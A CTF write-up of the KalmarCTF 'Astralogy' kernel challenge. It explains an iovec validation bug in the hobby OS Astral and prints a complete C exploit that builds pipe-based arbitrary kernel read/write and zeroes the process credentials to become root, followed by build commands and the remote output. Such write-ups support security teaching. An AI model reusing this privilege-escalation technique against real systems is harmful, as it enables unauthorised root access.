Writeup

KalmarCTF Astralogy — Writeup

Mohammed-Amine Bouaafia

March 28, 2026

11 min read

pwn kernel osdev iovec qemu

Heyy :))) so this is my first time solving a kernel exploitation ( btw it is not 100% human solve i get important exploit parts using ai since I’m not familiar with kernel exploitation let’s move to the writeup rn )

Astralogy — writeup

This writeup explains Astralogy in plain language so the full exploit path is easy to follow. The challenge gives us a hobby operating system named Astral, boots it inside QEMU, copies our uploaded block device to /home/astral/exploit, and expects us to break out of the unprivileged astral user and read /root/flag.txt.

The final exploit is not a ROP chain, not a shellcode trick, and not a race. It is a data-only kernel exploit:

find a kernel arbitrary read/write primitive
locate the current process credentials
zero the six credential integers
open /root/flag.txt as root

Because the kernel was compiled at fixed addresses and the VM only uses one CPU, that ended up being enough.

TL;DR (short summary)

The obvious pread/pwrite kernel-pointer bug was already patched by the challenge author.
The real bug is in Astral’s readv and writev path.
iovec_user_check() validates the wrong length field, so if the first iovec has length 0, later iovecs are never checked.
The iterator code then treats kernel addresses as safe and falls back to raw memcpy.
That gives arbitrary kernel read and arbitrary kernel write using a pipe.
Astral has no KASLR here, and the VM is single-core.
Reading bsp_cpu.thread gives the current thread pointer.
From there:
- thread->proc is at offset 48
- proc->cred is at offset 52
- cred_t is six ints, so 24 bytes total
Zeroing those 24 bytes turns the current process into uid 0 / gid 0.
Then opening /root/flag.txt succeeds.

Final flag:

kalmar{more_holes_than_swiss_cheese..._feel_free_to_share_your_exploit_in_a_ticket!}

Part 1 — The challenge setup

The local wrapper looked like this:

qemu-system-x86_64 \
    -M q35 \
    -m 256M \
    -smp cpus=1 \
    -cpu qemu64,+smep -enable-kvm \
    -cdrom challenge.iso -boot dc \
    -drive file="$exploit",format=raw,read-only,if=none,id=nvme \
    -device virtio-blk,serial=deadc0ff,drive=nvme \
    -nographic -monitor none

Important details:

-smp cpus=1 means there is only one CPU.
+smep means “jump to userland from kernel mode” is off the table.
Our payload is not executed directly by QEMU. It is exposed as a block device.

Inside the initrd, /etc/rc does this:

if [ -b /dev/vioblk0 ]; then
  cp /dev/vioblk0 /home/astral/exploit
  chown astral:astral /home/astral/exploit
  chmod +x /home/astral/exploit
fi

So the service flow is:

Upload a raw image.
Astral copies that raw device to /home/astral/exploit.
We log in as astral.
We run ./exploit.

That means our payload should be a small static ELF inside a raw file, not a Linux userspace exploit that expects a full runtime.

Part 2 — The first clue: the challenge includes a hardening patch

The shipped hardening.patch tells you what the easy bug used to be.

It does three interesting things:

It adds explicit user-pointer checks to syscall_pread() and syscall_pwrite().
It enables SMEP by adding 0x100000 to CR4 setup.
It clears DF on syscall entry.

The first point matters most. Before the patch, pread and pwrite forwarded the user pointer directly into the VFS layer without checking whether it really pointed into userspace. That would have been a trivial kernel read/write.

So the patch is effectively telling you:

“yes, there used to be a direct kernel pointer bug”
“no, you do not get to use it anymore”
“find the next user/kernel boundary mistake”

That pushed the analysis toward syscalls and device code that move user buffers around in more complex ways.

Part 3 — The real bug: `readv` / `writev`

Astral’s syscall_readv() and syscall_writev() copy the iovec array into kernel memory and then call iovec_user_check():

1
bool iovec_user_check(iovec_t *iovec, size_t count) {
2
    for (int i = 0; i < count; ++i) {
3
        // POSIX says that when len is zero, the addr can be an invalid buffer
4
        if (iovec->len && IS_USER_ADDRESS(iovec[i].addr) == false)
5
            return false;
6
    }
7

8
    return true;
9
}

The bug is subtle but deadly:

the code should check iovec[i].len
instead it checks iovec->len, which is iovec[0].len

So the first entry controls validation for the whole array.

If we make the first entry:

1
iov[0].len = 0;

then the condition is false for every loop iteration, which means:

entry 0 is accepted
entry 1 is accepted
entry 2 is accepted
every later entry is accepted

even if those entries point into kernel memory.

That is the bug.

Part 4 — Why this becomes arbitrary kernel read/write

The next step is understanding how Astral copies data through iovecs.

The relevant helper macros are:

1
#define USERCOPY_POSSIBLY_FROM_USER(kernel, user, size) \
2
    (IS_USER_ADDRESS(user) ? usercopy_fromuser(kernel, user, size) : _usercopy_memcpy_wrapper(kernel, user, size))
3

4
#define USERCOPY_POSSIBLY_TO_USER(user, kernel, size) \
5
    (IS_USER_ADDRESS(user) ? usercopy_touser(user, kernel, size) : _usercopy_memcpy_wrapper(user, kernel, size))

This is the key design mistake:

if the pointer looks like a userspace pointer, Astral uses fault-safe usercopy helpers
if the pointer does not look like a userspace pointer, Astral falls back to plain memcpy

That only makes sense if the caller already proved that the pointer is trusted kernel memory. Here, because iovec_user_check() can be bypassed, untrusted user-controlled pointers reach this code.

Now look at the iterator helpers:

1
error = USERCOPY_POSSIBLY_FROM_USER(
2
    (void *)((uintptr_t)buffer + total_done),
3
    (void *)((uintptr_t)iovec_iterator->current->addr + iovec_iterator->current_offset),
4
    copy_current
5
);

and:

1
error = USERCOPY_POSSIBLY_FROM_USER(
2
    (void *)((uintptr_t)iovec_iterator->current->addr + iovec_iterator->current_offset),
3
    (void *)((uintptr_t)buffer + total_done),
4
    copy_current
5
);

So:

writev() can copy from our iovec entry into some kernel-controlled buffer
readv() can copy from some kernel-controlled buffer into our iovec entry

If the iovec entry is a kernel pointer, those become raw kernel memory operations.

Part 5 — Building a stable primitive with a pipe

A pipe is the simplest way to turn that into something reliable.

Why a pipe?

no filesystem offsets to manage
easy byte buffering
the VFS path goes through the buggy iovec iterators
the data flow is very simple

The plan is:

create a pipe
use writev(pipe_write, iov, 2) with iov[1].addr = kernel_address
the pipe’s write side copies from that kernel address into the pipe ringbuffer
call read(pipe_read, out, len) to receive the leaked bytes in normal userspace

That is arbitrary kernel read.

For arbitrary kernel write:

write our chosen bytes into the pipe using normal write(pipe_write, src, len)
use readv(pipe_read, iov, 2) with iov[1].addr = kernel_address
the pipe’s read side copies from the pipe ringbuffer into that kernel address

That is arbitrary kernel write.

So the exploit helpers become:

kread(addr, out, len)
kwrite(addr, src, len)

implemented with:

writev + read for reads
write + readv for writes

The zero-length first iovec is just the gate that disables validation:

1
iov[0].addr = (void *)0x1337000;
2
iov[0].len  = 0;
3
iov[1].addr = (void *)kernel_address;
4
iov[1].len  = len;

Entry 0 can point anywhere because POSIX allows invalid addresses for zero-length iovecs. Astral even tries to support that. The problem is that Astral accidentally lets that exception disable checks for later entries too.

Part 6 — Finding the current process

Once arbitrary kernel read/write exists, the rest is mostly bookkeeping.

First, I checked the kernel binary:

it is a fixed-address ET_EXEC
no KASLR was involved here
symbols were present

That means important globals can be used directly.

The easiest anchor was:

ffffffff800b2de0 b bsp_cpu

Astral’s cpu_t starts like this:

1
typedef struct cpu_t {
2
    thread_t *thread;
3
    struct cpu_t *self;
4
    vmmcontext_t *vmmctx;
5
    ...
6
} cpu_t;

So at bsp_cpu + 0, the kernel stores the current thread pointer for the bootstrap CPU.

Because the VM uses only one CPU, bsp_cpu.thread is exactly the current thread we care about.

Then the structure offsets are:

1
thread->proc      @ offset 48
2
proc->cred        @ offset 52
3
cred_t size       = 24 bytes

cred_t itself is:

1
typedef struct {
2
    int uid, euid, suid;
3
    int gid, egid, sgid;
4
} cred_t;

And Astral treats uid 0 / gid 0 as superuser:

1
#define CRED_SUPERUSER 0

So we do not need to patch function pointers, syscall tables, or code pages. We just write 24 zero bytes to:

proc + 52

After that, the current process is root.

That cleanly avoids SMEP:

no kernel PC control
no userland execution in ring 0
only data corruption

Part 7 — Small but important Astral-specific quirks

There were two non-Linux details that mattered while turning the primitive into a reliable solve.

7.1 `pipe2` does not behave like Linux

On Linux, pipe2(int pipefd[2], int flags) writes the two FDs to a user buffer.

Astral does not do that.

Its syscall implementation is:

1
syscallret_t syscall_pipe2(context_t *, int flags) {
2
    ...
3
    ret.ret = (uint64_t)readfd | ((uint64_t)writefd << 32);
4
    return ret;
5
}

So the two file descriptors are packed into rax.

That means the exploit has to decode them like this:

1
pipefd[0] = (int)(ret.ret & 0xffffffffUL);
2
pipefd[1] = (int)((ret.ret >> 32) & 0xffffffffUL);

My first exploit attempt assumed Linux semantics and failed immediately.

7.2 The uploaded payload should be padded as a raw image

The remote service asks for a URL, downloads the file, and exposes it as a raw block device.

In practice, padding the image made the transport reliable:

cp exploit exploit.img
truncate -s 12288 exploit.img

Then Astral copied /dev/vioblk0 to /home/astral/exploit correctly and the guest file had the expected size.

Without that padding, the copied guest file was not reliable enough for exploitation.

Part 8 — Full exploit code

This is the exploit I used. It is intentionally tiny:

no libc
raw Astral syscalls
pipe-based kread / kwrite
credential overwrite
open and print the flag

1
#define NULL ((void *)0)
2

3
typedef unsigned long size_t;
4
typedef unsigned long uint64_t;
5
typedef long int64_t;
6

7
typedef struct {
8
    void *addr;
9
    size_t len;
10
} iovec_t;
11

12
typedef struct {
13
    long ret;
14
    long err;
15
} syscallret_t;
16

17
enum {
18
    SYS_OPENAT = 2,
19
    SYS_READ = 3,
20
    SYS_CLOSE = 5,
21
    SYS_WRITE = 7,
22
    SYS_EXIT = 13,
23
    SYS_PIPE2 = 22,
24
    SYS_WRITEV = 97,
25
    SYS_READV = 98,
26
};
27

28
#define AT_FDCWD (-100)
29
#define O_RDONLY 0
30

31
#define STDOUT_FILENO 1
32
#define STDERR_FILENO 2
33

34
#define BSP_CPU_ADDR 0xffffffff800b2de0UL
35
#define THREAD_PROC_OFF 48UL
36
#define PROC_CRED_OFF 52UL
37
#define CRED_SIZE 24UL
38

39
static inline syscallret_t syscall6(long nr, long a1, long a2, long a3, long a4, long a5, long a6) {
40
    register long rax asm("rax") = nr;
41
    register long rdi asm("rdi") = a1;
42
    register long rsi asm("rsi") = a2;
43
    register long rdx asm("rdx") = a3;
44
    register long r10 asm("r10") = a4;
45
    register long r8 asm("r8") = a5;
46
    register long r9 asm("r9") = a6;
47

48
    asm volatile(
49
        "syscall"
50
        : "+a"(rax), "+d"(rdx)
51
        : "D"(rdi), "S"(rsi), "r"(r10), "r"(r8), "r"(r9)
52
        : "rcx", "r11", "memory"
53
    );
54

55
    syscallret_t out = {
56
        .ret = rax,
57
        .err = rdx,
58
    };
59
    return out;
60
}
61

62
static inline syscallret_t syscall3(long nr, long a1, long a2, long a3) {
63
    return syscall6(nr, a1, a2, a3, 0, 0, 0);
64
}
65

66
static inline syscallret_t syscall1(long nr, long a1) {
67
    return syscall6(nr, a1, 0, 0, 0, 0, 0);
68
}
69

70
static inline syscallret_t sys_openat(long dirfd, const char *path, long flags, long mode) {
71
    return syscall6(SYS_OPENAT, dirfd, (long)path, flags, mode, 0, 0);
72
}
73

74
static inline syscallret_t sys_read(long fd, void *buf, long count) {
75
    return syscall3(SYS_READ, fd, (long)buf, count);
76
}
77

78
static inline syscallret_t sys_write(long fd, const void *buf, long count) {
79
    return syscall3(SYS_WRITE, fd, (long)buf, count);
80
}
81

82
static inline syscallret_t sys_close(long fd) {
83
    return syscall1(SYS_CLOSE, fd);
84
}
85

86
static inline syscallret_t sys_pipe2(long flags) {
87
    return syscall1(SYS_PIPE2, flags);
88
}
89

90
static inline syscallret_t sys_writev(long fd, const iovec_t *iov, long count) {
91
    return syscall3(SYS_WRITEV, fd, (long)iov, count);
92
}
93

94
static inline syscallret_t sys_readv(long fd, const iovec_t *iov, long count) {
95
    return syscall3(SYS_READV, fd, (long)iov, count);
96
}
97

98
__attribute__((noreturn))
99
static inline void sys_exit(long status) {
100
    (void)syscall1(SYS_EXIT, status);
101
    for (;;)
102
        asm volatile("hlt");
103
}
104

105
static size_t cstrlen(const char *s) {
106
    size_t n = 0;
107
    while (s[n] != '\0')
108
        n++;
109
    return n;
110
}
111

112
static void write_all(int fd, const void *buf, size_t len) {
113
    const char *p = (const char *)buf;
114
    while (len) {
115
        syscallret_t ret = sys_write(fd, p, len);
116
        if (ret.ret <= 0)
117
            sys_exit(1);
118
        p += ret.ret;
119
        len -= (size_t)ret.ret;
120
    }
121
}
122

123
static void puts2(const char *s) {
124
    write_all(STDERR_FILENO, s, cstrlen(s));
125
}
126

127
static void puthex64(uint64_t value) {
128
    static const char digits[] = "0123456789abcdef";
129
    char buf[19];
130
    buf[0] = '0';
131
    buf[1] = 'x';
132
    for (int i = 0; i < 16; i++)
133
        buf[2 + i] = digits[(value >> (4 * (15 - i))) & 0xf];
134
    buf[18] = '\n';
135
    write_all(STDERR_FILENO, buf, sizeof(buf));
136
}
137

138
static void leak_into(int read_end, int write_end, uint64_t kaddr, void *out, size_t len) {
139
    iovec_t iov[2];
140

141
    iov[0].addr = (void *)0x1337000;
142
    iov[0].len = 0;
143
    iov[1].addr = (void *)kaddr;
144
    iov[1].len = len;
145

146
    syscallret_t ret = sys_writev(write_end, iov, 2);
147
    if (ret.ret != (long)len || ret.err != 0)
148
        sys_exit(2);
149

150
    ret = sys_read(read_end, out, len);
151
    if (ret.ret != (long)len || ret.err != 0)
152
        sys_exit(3);
153
}
154

155
static void write_from(int read_end, int write_end, uint64_t kaddr, const void *src, size_t len) {
156
    iovec_t iov[2];
157

158
    syscallret_t ret = sys_write(write_end, src, len);
159
    if (ret.ret != (long)len || ret.err != 0)
160
        sys_exit(4);
161

162
    iov[0].addr = (void *)0x1337000;
163
    iov[0].len = 0;
164
    iov[1].addr = (void *)kaddr;
165
    iov[1].len = len;
166

167
    ret = sys_readv(read_end, iov, 2);
168
    if (ret.ret != (long)len || ret.err != 0)
169
        sys_exit(5);
170
}
171

172
static uint64_t load_u64(const unsigned char *buf) {
173
    uint64_t out = 0;
174
    for (int i = 7; i >= 0; i--) {
175
        out <<= 8;
176
        out |= buf[i];
177
    }
178
    return out;
179
}
180

181
void _start(void) {
182
    int pipefd[2];
183
    unsigned char scratch[32];
184
    unsigned char zeroes[CRED_SIZE];
185

186
    puts2("start\n");
187

188
    for (size_t i = 0; i < sizeof(zeroes); i++)
189
        zeroes[i] = 0;
190

191
    syscallret_t ret = sys_pipe2(0);
192
    if (ret.ret < 0 || ret.err != 0)
193
        sys_exit(10);
194
    pipefd[0] = (int)(ret.ret & 0xffffffffUL);
195
    pipefd[1] = (int)((ret.ret >> 32) & 0xffffffffUL);
196
    puts2("pipe ok\n");
197

198
    leak_into(pipefd[0], pipefd[1], BSP_CPU_ADDR, scratch, 8);
199
    uint64_t thread = load_u64(scratch);
200
    puts2("thread leaked\n");
201

202
    leak_into(pipefd[0], pipefd[1], thread + THREAD_PROC_OFF, scratch, 8);
203
    uint64_t proc = load_u64(scratch);
204
    puts2("proc leaked\n");
205

206
    write_from(pipefd[0], pipefd[1], proc + PROC_CRED_OFF, zeroes, sizeof(zeroes));
207
    puts2("cred written\n");
208

209
    puts2("thread=");
210
    puthex64(thread);
211
    puts2("proc=");
212
    puthex64(proc);
213

214
    ret = sys_close(pipefd[0]);
215
    if (ret.ret != 0 || ret.err != 0)
216
        sys_exit(11);
217
    ret = sys_close(pipefd[1]);
218
    if (ret.ret != 0 || ret.err != 0)
219
        sys_exit(12);
220

221
    ret = sys_openat(AT_FDCWD, "/root/flag.txt", O_RDONLY, 0);
222
    if (ret.ret < 0 || ret.err != 0)
223
        sys_exit(13);
224
    puts2("flag opened\n");
225

226
    int fd = (int)ret.ret;
227
    for (;;) {
228
        ret = sys_read(fd, scratch, sizeof(scratch));
229
        if (ret.err != 0)
230
            sys_exit(14);
231
        if (ret.ret == 0)
232
            break;
233
        write_all(STDOUT_FILENO, scratch, (size_t)ret.ret);
234
    }
235

236
    (void)sys_close(fd);
237
    sys_exit(0);
238
}

Part 9 — Building and running it

I built the payload as a tiny static ELF with no libc:

cc -nostdlib -static -fno-pie -no-pie -fno-stack-protector -fno-builtin \
   -Wl,--build-id=none -Os exploit.c -o exploit

Then I wrapped it into a padded raw image:

cp exploit exploit.img
truncate -s 12288 exploit.img

Remote solve flow:

connect with nc
solve the hashcash challenge
send a URL hosting exploit.img
wait for Astral to boot
run:

./exploit

Remote output:

start
pipe ok
thread leaked
proc leaked
cred written
thread=0xffff800020c06b30
proc=0xffff800020c39b40
flag opened
kalmar{more_holes_than_swiss_cheese..._feel_free_to_share_your_exploit_in_a_ticket!}

Last Part — Recap about how we solve it

The patch removed the easy pread / pwrite primitive.
readv / writev still had a validation bug.
A zero-length first iovec disabled checks for all later iovecs.
The iovec copy helpers treated kernel pointers as plain memcpy targets.
A pipe converted that into kernel arbitrary read/write.
Fixed kernel addresses and one CPU made the current thread easy to find.
Overwriting proc->cred with zeroes made the process root.
Reading /root/flag.txt finished the challenge.

Final note and flag

Recovered flag: